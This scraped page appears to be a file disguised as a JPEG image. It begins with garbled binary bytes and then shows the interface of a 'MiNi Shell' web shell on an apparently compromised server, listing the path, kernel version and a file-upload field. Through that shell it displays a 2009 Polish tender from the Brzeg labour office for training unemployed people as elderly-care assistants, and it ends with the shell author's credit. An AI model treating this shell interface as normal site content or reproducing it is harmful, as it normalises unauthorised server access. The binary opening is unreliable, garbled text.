JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090407/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090407/95148-N-2009.html

<p class="kh_header"><b>Brzeg: Przetarg nieograniczony na organizację i przeprowadzenie szkolenia zawodowego osób bezrobotnych w zakresie:
Zadanie nr 1 Opiekunka osób starszych i niepełnosprawnych
Zadanie nr 2 Opiekunka osób Starszych i niepełnosprawnych z językiem  niemieckim</b><br>
<b>Numer ogłoszenia: 95148 - 2009; data zamieszczenia: 07.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Brzegu , ul. Armii Krajowej 32, 49-300 Brzeg, woj. opolskie, tel. 077 4441390 do 2, faks 077 4441390 do 2.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na organizację i przeprowadzenie szkolenia zawodowego osób bezrobotnych w zakresie:
Zadanie nr 1 Opiekunka osób starszych i niepełnosprawnych
Zadanie nr 2 Opiekunka osób Starszych i niepełnosprawnych z językiem  niemieckim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie szkolenia zawodowego w zakresie
Opiekunka osób starszych i niepełnosprawnych oraz Opiekunka osób starszych  i niepełnosprawnych z elementami języka niemieckiego dla osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Brzegu. Szkoleniem zostanie objętych 24 osoby bezrobotne, w dwóch 12 - osobowych grupach:
Zadanie nr 1   
Opiekunka osób starszych i niepełnosprawnych - I grupa  oraz 
Zadanie nr 2  
Opiekunka osób starszych i niepełnosprawnych z elementami języka niemieckiego - II grupa.

Zadanie nr 1 i zadanie nr 2 będą realizowane w dwóch odrębnych grupach. 
 
 
Cel szkolenia i syntetyczny opis zawodu. Celem szkolenia jest  zapoznanie z problemami psycho - fizycznymi człowieka w podeszłym wieku, nabycia umiejętności diagnozowania dysfunkcji zakłócających tok prawidłowego funkcjonowania oraz rozpoznawanie uświadomionych i nieuświadomionych potrzeb człowieka w wieku podeszłym, motywowanie go do dbania o higienę osobistą i o czystość. Istotnym działem szkolenia jest nauka związana z nabyciem umiejętności oceniania sytuacji zdrowotnej podopiecznego w zakresie zastosowania rehabilitacji we własnym domu, a także w innych placówkach świadczących usługi na rzecz osób starszych i niepełnosprawnych. 
Opiekunka osób starszych winna w sposób przyjacielski i serdeczny troszczyć się o 
powierzoną jej starszą osobę, o jej dobre samopoczucie i być pomocną w jej  
codziennym życiu. 

Opis zawodu.
Wykonywanie zawodu opiekunki osób starszych i niepełnosprawnych wiąże się z zapewnieniem bezpieczeństwa i zaspokojeniem podstawowych potrzeb osób           
powierzonych opiece. Opieka sprawowana jest nad osobami dorosłymi, cierpiącymi i niepełnosprawnymi, niezaradnymi, starymi itp. Stroną zatrudniającą jest rodzina lub opiekun prawny, którzy sami nie są w stanie poświęcić odpowiedniego czasu na opiekę.
Zadania zawodowe opiekunki obejmują dbanie o higienę osobistą podopiecznych, którym zwykle należy pomóc przy myciu, kąpieli i ubieraniu.
Opiekunka utrzymuje w czystości bieliznę osobistą i pościelową, przygotowuje i podaje posiłki zgodnie z zaleceniami żywieniowymi i dietetycznymi, w razie potrzeby karmi podopiecznego. Do obowiązków opiekunki należy podawanie doustne leków zgodnie z zaleceniem lekarza i kontrolowanie prawidłowości ich przyjmowania. Opiekunka dba również o aktywne spędzanie czasu przez podopiecznego- organizuje spacery i zajęcia rekreacyjne stosownie do jego możliwości.
  
Miejsce prowadzenia zajęć teoretycznych i praktycznych
Zajęcia teoretyczno - praktyczne muszą być prowadzone na terenie miasta Brzeg. 
Zajęcia praktyczne (praktyka) mogą być prowadzone na terenie powiatu brzeskiego, np. w Domach Stałej Opieki, Zakładach Rehabilitacyjno - Leczniczych, 
Hospicjach, Domach Spokojnej Starości, Domach Pomocy Społecznej. W  takiej sytuacji Wykonawca zobowiązuje się dowozić uczestników szkolenia do miejsca praktyki na  własny koszt.

Przed rozpoczęciem szkolenia Wykonawca zobowiązany jest przeprowadzić na 
własny koszt badania sanitarno- epidemiologiczne (badania sanepidowskie osób 
szkolonych).
Rozporządzenie Ministra Zdrowia z dnia 2 lutego 2006 r. Dz. U. z 2006 r. nr 25 poz. 191  z późn. zm.
Koszt badań i Książeczki Zdrowia dla celów sanitarno- epidemiologicznych winny być ujęte w cenie oferty.
       
Wymagania dotyczące kadry: Część teoretyczno- praktyczną (zagadnienia z zakresu opieki nad osobami starszymi i niepełnosprawnymi) mają prowadzić co najmniej dwie osoby z: 
- wykształceniem wyższym z zakresu medycyny (wykwalifikowana kadra pielęgniarsko- lekarska), czyli osoby posiadające doświadczenie dydaktyczne i zawodowe związane z tematyką szkolenia.
- wiedza i doświadczenie z zakresu geriatrii, rehabilitacji osób starszych i niepełnosprawnych
- bardzo dobre kontakty interpersonalne oraz wysoka kultura osobista.

Wykonawca winien zapewnić, iż: w grupie II prowadzone będą zajęcia z języka 
niemieckiego - przez lektora z wykształceniem wyższym kierunkowym z uprawnieniami nauczycielskim.

Zajęcia mają odbywać się w profesjonalnie przygotowanych salach: 
- sale fantomowe ( sale o warunkach bardzo zbliżonych do rzeczywistych  warunków opieki nad osobami starszymi i niepełnosprawnymi wyposażone w: fantom dorosłego człowieka, łóżka szpitalne, sprzęt i zestawy do wykonywania różnych zabiegów pielęgnacyjnych i higienicznych),
- sale seminaryjne z wyposażeniem multimedialnym, w tym:                                                                                 
- aparaturę audiowizualną, 
- kserokopiarkę,
- rzutnik pisma,
- tablicę flipchart, tablica naścienna lub tablica informacyjna ( foliowo-magnetyczna) 
- biurka i krzesła

Zajęcia teoretyczne i praktyczne powinny odbywać się oddzielnie.
        
Wykonawca podczas szkolenia zapewni prawidłowe warunki pracy zgodnie z przepisami BHP i p.poż.
       
Wykonawca winien zapewnić dla uczestników szkolenia: 
-  zbindowany skrypt lub książkę, 
-  materiały kancelaryjne, 
-  materiały do zajęć praktycznych, 
-  odzież i obuwie ochronne, 
-  środki dydaktyczne,
-  inne materiały zgodne z preliminarzem kosztów wg załącznika nr 2 załączonego   
do oferty, 
- zimne i gorące napoje oraz poczęstunek (kanapki) dla osób zamieszkałych poza   
miejscem szkolenia.
           
W ramach udzielonego zamówienia Wykonawca zobowiązany jest do 
zorganizowania egzaminu wewnętrznego ze zdobytej wiedzy oraz wydania 
dokumentu stwierdzającego ukończenie szkolenia. Uczestnicy szkolenia winni 
otrzymać:  Zaświadczenia o ukończeniu szkolenia, zgodnie z §6 rozporządzenia  
Ministra Edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania 
przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowej w formach pozaszkolnych ( Dz. U. z 2006r. Nr 31, poz. 216).
Wykonawca powinien dołączyć  do oferty wzór  zaświadczenia potwierdzającego  
ukończenie szkolenia i uzyskanie kwalifikacji.

Wykonawca nie ubezpiecza uczestników szkolenia od następstw nieszczęśliwych   
wypadków powstałych w związku ze szkoleniem oraz w drodze do miejsca szkolenia i z powrotem.        
                 
Jeżeli uczestnik przerwie szkolenie Zamawiający może skierować na zwolnione miejsce nową osobę bezrobotną, która zobowiązana jest realizować obowiązki uczestnika szkolenia na zasadach określonych niniejszą umową. W takim przypadku Zamawiający pokryje jedynie koszt odpowiadający kosztowi przewidzianego dla jednej osoby. Wykonawca zobowiązany jest przeszkolić te osoby  w zakresie już przerobionego materiału. 
      
Warunki szczegółowe wykonania zamówienia:
         
Zadanie numer 1 (grupa I):
Wymagany czas trwania szkolenia na jednego kursanta ogółem 240 godzin w części 
teoretycznej i praktycznej z zakresu tematyki medycznej. 
        
Zadanie numer 2 (grupa II):
Wymagany czas trwania szkolenia na jednego kursanta ogółem 240 godzin w części 
teoretycznej i praktycznej z zakresu tematyki medycznej oraz 90 godzin zajęć z 
elementami języka niemieckiego.  


Zakres tematyczny szkolenia dla obu grup w części teoretycznej i praktycznej z zakresu tematyki medycznej musi obejmować:
80 godzin zajęć teoretycznych,
160 godzin zajęć praktycznych, w tym: 80 godzin w placówkach specjalistycznych.

Tematyka szkolenia powinna zawierać m.in.:  
- wykonywanie zabiegów pielęgnacyjno- higienicznych (pielęgnacja ran
   przewlekłych, pielęgnacja chorego leżącego w łóżku itp.),
- czuwanie nad prawidłowym odżywianiem osób starszych i
   niepełnosprawnych,
-  rozwiązywanie problemów zdrowotnych wieku geriatrycznego,
-  udzielanie pierwszej pomocy w stanach zagrożenia zdrowia osoby starszej,
   niepełnosprawnej, reanimacja,
-  umiejętność prawidłowej opieki i zagospodarowania wolnego czasu (terapia
   zajęciowa, stymulacja psychologiczna),
-  współpraca z podopiecznym i jego rodziną,
-  rozpoznawanie, klasyfikacja i eliminowanie czynników i sytuacji
   zagrażających zdrowiu i bezpieczeństwu podopiecznego,
-  zapoznanie się z przepisami dotyczącymi bezpieczeństwa i higieny pracy
   podczas opieki nad osobą starsza i niepełnosprawną.

Zajęcia praktyczne  - praktyka przeprowadzona winna być również na terenie powiatu brzeskiego w  placówkach specjalistycznych, takich jak : Domy Stałej Opieki, Zakłady Rehabilitacyjno - Lecznicze, Hospicja, Domy Spokojnej Starości, Domy Pomocy Społecznej w wymiarze 80 godzin zegarowych na jedną osobę szkoloną.
Przydziału do odbycia praktyki dokona Wykonawca w porozumieniu z  
uczestnikiem kursu.         
Wykonawca zobowiązany jest do zapewnienia praktyki w co najmniej w dwóch 
specjalistycznych placówkach. Każdy z uczestników kursu odbędzie praktykę 
(80 godzin)  w każdej z dwóch placówek specjalistycznych. 

1. Język obcy: dla II grupy szkolenia język niemiecki wyniesie  90 godzin zegarowych (zakres skoordynowany z tematyką kursu). Moduł powinien zawierać m. in. zwroty z zakresu: przedstawiania się, podstawowej komunikacji z chorym i jego rodziną, lekarzem i słownictwa medycznego ( leki, choroby, dolegliwości).
Osoba kończąca szkolenie językowe winna posiadać umiejętność komunikowania się w stopniu podstawowym z podopiecznym, jego rodziną i lekarzem.
Podczas realizacji szkolenia dla II grupy w zakresie nauczania elementów języka niemieckiego winny być wykorzystane dodatkowe materiały dydaktyczne takie jak: płyty CD, audio, materiały zawierające interaktywne ćwiczenia, płyty DVD, technologie informacyjne - korzystanie ze stron www przygotowanych dla potrzeb konkretnych podręczników oraz rzutniki i słowniki. 

Szkolenie winno być realizowane według planu nauczania obejmującego przeciętnie  nie mniej niż 30 godzin zegarowych w tygodniu.
Godzina oznacza godzinę zegarową tj. 60 minut.
Zajęcia winny odbywać się w dni robocze od poniedziałku do piątku pomiędzy  
godzinami 8:00 - 15:00.
Okres realizacji szkolenia dla grupy I wyniesie 8 pełnych tygodni, a dla grupy II   
wyniesie 11 pełnych tygodni..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Wykonawca spełnia warunki udziału w postępowaniu Pkt. 8.1.2. SIWZ 
2. Wykonawca nie podlega wykluczeniu na podstawie art. 24 ustawy Pkt. 8.1.2. SIWZ
3. Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia Pkt. 8.1.2. SIWZ
4. Oferta obejmuje całość zamówienia i nie modyfikuje zakresu przedmiotu zamówienia określonego przez zamawiającego w SIWZ Pkt. 8.1.1. SIWZ
5. Wykonawca podpisze umowę zgodną z niniejszą SIWZ, a także zgodną z ofertą Pkt. 8.1.1. SIWZ
6. Oferta jest przygotowana zgodnie z formularzami, stanowiącymi załączniki do niniejszej SIWZ i zgodnie z wymaganiami SIWZ	Oferta
7. Wykonawca posiada uprawnienia i zezwolenie na prowadzenie  tego typu szkolenia wydane przez właściwy organ. Pkt. 8.1.9  SIWZ
8. Oferta jest dostarczona w opakowaniu uniemożliwiającym odczytanie jego zawartości bez uszkodzenia tego opakowania i opatrzona informacjami zawartymi w punkcie Składanie ofert Oferta
9. Wykonawca pozostaje związany ofertą przez okres 30 dni od daty upływu terminu składania ofert Pkt. 8.1.1. SIWZ

Oferty Wykonawców spełniające powyższe warunki zostaną poddane ocenie zgodnie z kryteriami zawartymi w niniejszej SIWZ.
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia-nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenia lub dokumenty, jakie mają dostarczyć wykonawcy:
Wypełniony formularz oferty (wg załączonego wzoru).
Oświadczenie o spełnianiu warunków wynikających z art. 22 ust. 1 ustawy (załącznik nr 1 do oferty, oddzielnie dla Zadania nr 1 i dla Zadania nr 2) oraz Oświadczenie o nie podleganiu z wykluczenia na podstawie art. 24 ust. 1 i 2 ustawy (wg wzoru określonego w zał. nr 1a do oferty, oddzielnie dla Zadania nr1 i dla Zadania nr.2.       
Preliminarz kosztów (wg wzoru określonego w załączniku nr 2 do oferty, oddzielnie dla Zadania nr1 i dla Zadania nr2).
Szczegółowy program szkolenia oraz adres miejsca szkolenia
Program szkolenia winien być zgodny z § 5 rozporządzenia Ministra Edukacji i  Nauki 
z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe  
wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych  
(Dz.U. z 2006r. Nr 31, poz. 216).

Program nauczania każdej formy winien zawierać:
- nazwę formy kształcenia
- czas trwania i sposób jej organizacji
- wymagania wstępne dla uczestników
- cele kształcenia
- plan nauczania określający nazwę zajęć edukacyjnych oraz jej wymiar
- treści kształcenia w zakresie poszczególnych zajęć edukacyjnych
- wykaz literatury oraz niezbędnych środków i zajęć dydaktycznych
- sposób sprawdzania efektów kształcenia
Wykonawca winien dołączyć do oferty wzór ankiety dla uczestników służącej do oceny szkolenia.
Adres miejsca szkolenia zajęć teoretycznych, praktycznych oraz językowych należy podać w dokumentacji składanej wraz z ofertą. 
Wykaz niezbędnych środków oraz przyborów jakimi dysponuje Wykonawca ( wg wzoru określonego w załączniku nr 3 do oferty, oddzielnie dla Zadania nr1 i dla Zadania nr2).
Wykaz osób i podmiotów wykonujących zamówienie (wg wzoru określonego w załączniku nr 4 do oferty, oddzielnie dla Zadania nr 1 i dla Zadania nr 2).
Wymagane jest załączenie dokumentów potwierdzających posiadanie uprawnień, wykształcenia, kwalifikacji w zakresie realizacji przedmiotu zamówienia.
Wykaz materiałów przeznaczonych do prowadzenia zajęć praktycznych (wg wzoru określonego w załączniku nr 5 do oferty, oddzielnie dla Zadania nr1 i dla zadania nr 2).
Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej lub zgłoszenie do ewidencji działalności gospodarczej - dla osób prowadzących działalność gospodarczą wystawione nie wcześniej niż 6 m-cy przed upływem terminu składania ofert.
Aktualne zaświadczenie o wpisie do rejestru instytucji szkoleniowych wydane przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane jest załączenie pełnomocnictwa.
Pełnomocnictwo - w przypadku gdy Wykonawcę reprezentuje pełnomocnik, posiadające zakres pełnomocnictwa i podpisane przez osoby reprezentujące Wykonawcę.

Forma składanych dokumentów
Zgodnie z obowiązującym rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich zamawiający może żądać od Wykonawcy, oraz form, w jakich te dokumenty maja być składane (Dz. U. nr 87 poz. 605), dokumenty należy przedstawić w formie oryginałów albo kserokopii. Dokumenty złożone w formie kserokopii muszą być poświadczone za zgodność z oryginałem przez osobę uprawnioną do podpisania oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 50</li>
<li>2 - Kwalifikacje kadry dydaktycznej - 30</li>
<li>3 - Warunki lokalowe i sprzęt jakim dysponuje wykonawca - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://pup.brzeg.sisco.info.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Brzegu
ul. Armii Krajowej 32
49-300 Brzeg
pokój 25 lub pokój 29.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2009 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Brzegu
ul. Armii Krajowej 32
49-300 Brzeg
pokój 16.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opiekunka osób starszych i niepełnosprawnych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie szkolenia zawodowego w zakresie
Opiekunka osób starszych i niepełnosprawnych  dla osób bezrobotnych   
zarejestrowanych w Powiatowym Urzędzie Pracy w Brzegu. Szkoleniem zostanie 
objętych 12 osób bezrobotnych..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Kwalifikacje kadry dydaktycznej - 30</li>
<li>3. Warunki lokalowe i sprzęt jakim dysponuje wykonawca - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opiekunka osób starszych i niepełnosprawnych z elementami języka niemieckiego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie szkolenia zawodowego w zakresie
Opiekunka osób starszych i niepełnosprawnych z elementami języka niemieckiego. dla osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Brzegu. Szkoleniem zostanie objęte 12 osób bezrobotnych..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Kwalifikacje kadry dydaktycznej - 30</li>
<li>3. Warunki lokalowe i sprzęt jakim dysponuje wykonawca - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com